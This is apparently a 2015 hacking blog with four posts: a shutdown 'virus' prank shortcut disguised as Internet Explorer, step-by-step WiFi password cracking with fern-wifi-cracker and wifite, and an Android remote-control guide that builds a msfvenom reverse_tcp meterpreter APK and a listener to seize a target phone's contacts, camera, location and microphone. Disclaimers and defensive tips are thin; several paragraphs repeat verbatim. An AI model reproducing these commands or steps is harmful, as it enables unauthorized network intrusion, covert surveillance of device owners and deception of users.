Wednesday 22 July 2015

How to make Shutdown virus shortcut (prank)

How to make Shutdown virus shortcut (prank) :


This post will teach you how to shut down pc with shortcut virus.Actually it is not a virus just a prank.It is simple command to turn off computer.

Works on Windows xp,Windows 7,Windows 8.1( Tested )

Step 1 : Right click on Desktop ==> New ==> Shortcut


Step 2 : 
Type : shutdown -s -t ## -c "type what message you want to Display
[ Replace ##  with Time in seconds ]

Example : shutdown -s -t 55 -c "Your PC is infected with Trojan 
Step 3 : Click next.Now you have to type name or leave as it is [ don't delete .exe otherwise it will not work ]

Step 4 : After creating exe file ,open it .Here i input 55 seconds so it will turn off within 55 seconds and message will display "Your PC is infected with Trojan" but actually it is not this message is fake input by user.



 Make it perfect prank (optional):
Right click the shortcut you just made, then click properties. You should see a button that says 'change icon', click it. If a pop up that says 'The file %windir%\system32\shutdown.exe contains no icons.' , then just hit 'Ok'. Select  any of the icons in there.
Example : Here i created my shutdown prank but i changed it's icon as internet explorer icon.Also named internet explorer.



# To Stop Shutdown :

Step 1 : Open run by combination of Window key + r .
Step 2 : Type "shutdown /a"

[ Any doubts just ask in comment box ]

Tuesday 21 July 2015

WIFI hack using kali linux ( Fern-wifi-cracker )

WIFI hack using kali linux ( Fern-wifi-cracker ) :

In this post i will show you how we can hack any type of WIFI encryption easily in just few click no more coding , this is all possible just because of fern-wifi-cracker software in KALI LINUX . But let me give short description about this software :

Fern wifi cracker is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools.

Disclaimer: I carried out this attack using my own WIFI network, all MAC Addresses and names have been faked. This tutorial is for learning purposes only and should not be used for any illegal activities.Don't break someone privacy who not belongs to you , im not liable for any illegal activity.......
[ If you  are newbie in hacking WIFI then please goto my previous post and read about basics of Hacking WIFI ]

[ All bold letter are command to type ]
------------------------------------------------------------------------------------------------------------------------------

# FOR  WEP ENCRYPTION :

Step 1 : Start KALI LINUX and open terminal as root .
Step 2 : In terminal
Type : "fern-wifi-cracker"
                                                       or
Goto -->> Applications --> Kali Linux -> Wireless tools -->> Fern-wifi-cracker .
It will open like this

Step 3 : Now as you can see in image

1 : Select wireless card for monitor mode at "step 1 in image"
2 : Click to Active wifi AP scanner
at "step 2 in image"
3 : Click on WEP option at "step 3 in image"
 

Step 4 : Now select target AP as shown in image.Click on regular attack ,then click attack

Tip : You can also select different attack mode ( you should know what you are doing , if you want to know about attack modes then check my post )
In my case i used caffe latte attack , and cracked WEP Encprytion in just 1min 25 seconds only.


After few mins when process is finished you can see the key as shown in image.

-----------------------------------------------------------------------------------------------------------------------

FOR WPA & WPA2 ENCRYPTION :


Step 1 : Start KALI LINUX and open terminal as root .
Step 2 : In terminal 
Type : "fern-wifi-cracker"

It will open like this
Step 3 : Now as you can see in image 

1 : Select wireless card for monitor mode at "step 1 in image"
2 : Click to Active wifi AP scanner at "step 2 in image"
3 : Click on WPA option ( in blue at step 3 ) 



Step 4 : Selct your target :


1 : Now select AP as shown in image then click on regular attack.Click on Browse option and navigate to your password list ( dictionary file ).
2 : Click attack.

# As you can see in the image i cracked WPA2 password successfully .

---------------------------------------------------------------------------------------------------------------------------

# FOR WPS :


Step 1 : Start KALI LINUX and open terminal as root .
Step 2 : In terminal 
Type : "fern-wifi-cracker"

It will open like this
Step 3 : Now as you can see in image 

1 : Select wireless card for monitor mode at "step 1 in image"
2 : Click to Active wifi AP scanner at "step 2 in image"
3 : Now select Encryption type from WEP or WPA  at " step 3 in image "


Step 4 : After selecting Encryption type just , follow as shown in image


 It will take 1 - 7 hour after then it will show WPS pin , you can use it as password.

Conclusion : From above demonstration you can understand nothing is secure everything is breakable now you all are thinking what to do , to save yourself for being hacked by someone , goto my post about basics of hacking.

Sunday 19 July 2015

Hack Wifi in 2 mins ( wifite )

How to Hack wifi in 2 mins ( wep ) using kali linux :


                     WEP - Wired Equivalent Privacy

Wifite : Wifite is a Linux-based platform tool that is available on variant Operating Systems like Kali, Backtrack 5, BlackBuntu, BackBox and Pentoo. Wifite is basically used to attack multiple encrypted networks (WEP, WPA/2 and WPS) in a row that is customized to be automated with only a few arguments. Wifite is a wireless auditing tool that aims to be the “set it and forget it” method of hacking.With the help of wifite we can easily break wep encrypted security ,we don't need to type too much  codes for cracking because wifite is automated .

Disclaimer: I carried out this attack using my own WIFI network, all MAC Addresses and names have been faked. This tutorial is for learning purposes only and should not be used for any illegal activities.Don't break someone privacy who not belongs to you , im not liable for any illegal activity.......

It is fully Automated attack , If one WEP Wifi attack fails, the other will be automatically come into action .

Note that : If you are beigneer then please read my previous post for basic knowledge of How to hack wifi.Also for how to speed up cracking. 

In this post i will guide you how to hack wifi wep security using wifite in just  mins  :
[ All the written bold letters are command ot type. ]

Things you will need :
1 ]  A Kali linux enabled System
2 ] Wireless card ( support promiscuous mode).I recommend you to use Alfa AWUS036NH USB wireless adapter.
3 ] Access point for cracking


Let's Start :

Step 1 :  open terminal and type " wifite ".

Step 2 : If you are using two wireless cards then select it by enter number,if you are using only one wireless card then skip this step2.

Step 3 :Select targeted access point [ Note : It should be wep encrypted and Select access point which having connected clients.]


Here i selected NUM 2 because it is wep encrypted and have connected client .also having good strength as compared to other.

Step 4 : After selecting access point crack process is started [ If  one WEP Wifi attack fails, the other will be automatically come into action . It contains attacks like chop-chop,ARP replay and many more ]


 As you can see one of the attack is failed but other attack came into action.Best thing about wifite.

Now speed is depend on distance between your machine and target access point.It also depends on your cpu.In my case it takes 1 min 37 seconds only

After this process complition you will see the WEP Key is a Hexadecimal representation of WEP WiFi’s password.This hexadecimal key can be used as simply WEP Key WiFi password.Or you can also convert it into actual password by using HEX-TO-ASCII converter.


Now see how everyone can easily break your wep security so , if you are on wep security just move to latest security that is WPA2 encryption ,but it dosen't mean that your wifi is 100% protected.WPA2 encrytion is also hackable but it is not easy like wep security.To protect yourself from being hacked by someone , read my previous post about How to Hack wifi.


[ Any doubt or questions please ask in comment box ]
Wifite is a Linux-based platform tool that is available on variant Operating Systems like Kali, Backtrack 5, BlackBuntu, BackBox and Pentoo. Wifite is basically used to attack multiple encrypted networks (WEP, WPA/2 and WPS) in a row that is customized to be automated with only a few arguments. Wifite is a wireless auditing tool that aims to be the “set it and forget it” method of hacking. - See more at: http://www.alltechbuzz.net/hack-wi-fi-password/#sthash.RC338jxU.dpuf
Wifite is a Linux-based platform tool that is available on variant Operating Systems like Kali, Backtrack 5, BlackBuntu, BackBox and Pentoo. Wifite is basically used to attack multiple encrypted networks (WEP, WPA/2 and WPS) in a row that is customized to be automated with only a few arguments. Wifite is a wireless auditing tool that aims to be the “set it and forget it” method of hacking. - See more at: http://www.alltechbuzz.net/hack-wi-fi-password/#sthash.RC338jxU.dpuf
Wifite is a Linux-based platform tool that is available on variant Operating Systems like Kali, Backtrack 5, BlackBuntu, BackBox and Pentoo. Wifite is basically used to attack multiple encrypted networks (WEP, WPA/2 and WPS) in a row that is customized to be automated with only a few arguments. Wifite is a wireless auditing tool that aims to be the “set it and forget it” method of hacking. - See more at: http://www.alltechbuzz.net/hack-wi-fi-password/#sthash.RC338jxU.dpuf
Wifite is a Linux-based platform tool that is available on variant Operating Systems like Kali, Backtrack 5, BlackBuntu, BackBox and Pentoo. Wifite is basically used to attack multiple encrypted networks (WEP, WPA/2 and WPS) in a row that is customized to be automated with only a few arguments. Wifite is a wireless auditing tool that aims to be the “set it and forget it” method of hacking. - See more at: http://www.alltechbuzz.net/hack-wi-fi-password/#sthash.RC338jxU.dpuf
 Wireless card (support promiscuous mode)
Wireless card (support promiscuous mode)
Wireless card (support promiscuous mode)
Wireless card (support promiscuous mode)
Wireless card (support promiscuous mode)

Saturday 18 July 2015

Hack android remotly( msfvenom )



In the previous post i shows you how to hack android device with metasploit ,but sadly Msfpayload  and Msfencode stopped working on 8 june 2015 beacuse creator ( offensive-security ) of msfpayload removed msfpayload utility .Some of you got this message when you type msfpayload : " The  msfpayload utility is deprecated " .but good news is offensive-security introduces new utility named as " msfvenom " which will replace both msfpayload and msfencode .

Now question arises How to use it.? But no worry today im going to show you how to use this utility with the example  " How to hack android device ".

Hack Remotely Control Any Android Device Using Kali Linux ( msfvenom ) :


This  post will teach you how to Hack Android devices to Control them Remotely.Now days every single person uses android device, people love and easily attract to android device because of its features and functionality but. There are soo many third party spy software's in market but some of them are fake and some of them not works properly.but today i will show you how to hack android device remotely.But please remember don't use it as illegally to exploit someone privacy who not belongs to you....


What actually are we doing:

In this tutorial, we are going to create a deploy application using Kali Linux Metasploit which should be installed on the target android device. When installed successfully, we can gain full access to that device.

Prerequisites :


1 ]  A PC or Laptop running on Linux Operating System .If you didn't installed or you don't
know how to run kali linux please goto my post How to install kali linux or how to run linux live( without installing ).or if you are running windows then goto my post How to run kali linux on virtual box.

2] Active Internet Connection( It should be good connection not like dialup ).

3] An Android device to exploit.

Features of this HACK :


  • Get contacts from remote android device.
  • Click snaps using front or back camera.
  • Get real-time pin point location.
  • Record real-time sound by using microphone of android device.
  • and lots more........

So , lets start :


Step1 : Open the terminal in Linux , type the below code and press enter.

:~#   msfvenom -p android/meterpreter/reverse_tcp LHOST=ip local(lan ip) or public(static)
LPORT=port R > name.apk



If you don't know your ip address, simply open another terminal and type "ifconfig" without quotes. You can see your ip address beside wlan0 it would be something like 192.168.x.x (Note: This will show you internal ip ( lan ip)  ).

Step2 : Now goto the
home folder.Find your newly created deploy application upgrade.apk will be automatically generated.
 
Step3 : Now open the listener by opening another terminal and type the below code.

:~#   msfconsole

[ Now metasploit is loading it will take some time approx. 55 seconds. ]

Step4 : When metasploit successfully loaded type the below code.

> use exploit/multi/handler
 
> set payload android/meterpreter/reverse_tcp
> set LHOST 192.168.XXX.XXX (the same ip address you entered in step1).
> set LPORT XXXX (the same port you used in step1).
exploit


Now the console starts listening to 192.168.xxx.xxx at port your_port.

Step5 : Now send the upgrade.apk from home folder to the target android device.

Step6 : Install the upgrade.apk on the target device and when the device is connected to the internet open the app.

Step7 : As soon as you open the app in the device, you can see the connected device in console terminal.


Step8  : Now you have full access to the device from the terminal. Just type help or and you will see list of  all the available commands.
 
[ Note : some of you got errors like starting to 0.0.0.0 at port 8080 something like this ,it means you are trying to use your dynamic ip ( and your router is DHCP enabled ) ,and this tutorial will works only on your lan network.If you want to do this on anywhere(static ip) just use your static public ip,if you are confused how to know static ip then please check my post on static and dynamic ip]

[ Note : Don't hack any  device who not belongs to you,it is illegal.If you did this , im not responsible.stealing someone information without permission is crime .It's for education purpose only. ]

How to save yourself form these type of hacks :


From this tutorial you may have understood how easy it is to hack android devices. So to protect your self from being hacked you should check the app thoroughly before installing it.Try to avoid unknown apps.check its publisher or developer.Install trusted developer apps only......

 -----------------------------------------------------------------------------------------------------------------------------
[ Any questions : ask in comment box ]